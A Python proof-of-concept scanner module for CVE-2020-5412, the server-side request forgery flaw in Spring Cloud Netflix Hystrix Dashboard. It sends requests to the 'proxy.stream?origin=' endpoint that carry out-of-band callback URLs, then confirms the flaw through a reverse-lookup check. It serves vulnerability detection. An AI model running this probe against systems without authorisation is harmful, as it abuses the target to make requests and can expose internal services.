# !/usr/bin/env python3
# @Time    : 2020/10/15
# @Author  : caicai
# @File    : poc_spring-cloud-netflix-hystrix-dashboard_CVE-2020-5412_2020.py

'''
搭建:
git clone https://github.com/mkheck/aou-hystrix-dashboard
mvn package
java -jar target.jar
curl -v localhost:8080
'''

from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
from myscan.lib.core.common_reverse import generate, query_reverse
from myscan.lib.core.common import get_random_str


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "CVE-2020-5412_2020"
        self.vulmsg = "detail:https://zhzhdoai.github.io/2020/09/01/CVE-2020-5412%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/,https://tanzu.vmware.com/security/cve-2020-5412"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        reverseurl, hexdata1 = generate(get_random_str(10).lower(), "http")
        _, hexdata2 = generate(get_random_str(10).lower(), "dns")
        for reverse in [reverseurl, "http://" + hexdata2]:
            req = {
                "url": self.url + "proxy.stream?origin={}".format(reverse),
                "method": "GET",
                "headers": {
                    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"},
                "verify": False,
                "timeout": 10,
            }
            r = request(**req)
        sleep = True
        for hexdata in [hexdata1, hexdata2]:
            res, resdata = query_reverse(hexdata, sleep)
            sleep = False
            if res:
                self.result.append({
                    "name": self.name,
                    "url": self.url,
                    "level": self.level,  # 0:Low  1:Medium 2:High
                    "detail": {
                        "vulmsg": self.vulmsg,
                        "path": "proxy.stream?origin={reverseurl}",
                        "others": "{} in reverse db".format(hexdata),
                    }
                })
                break
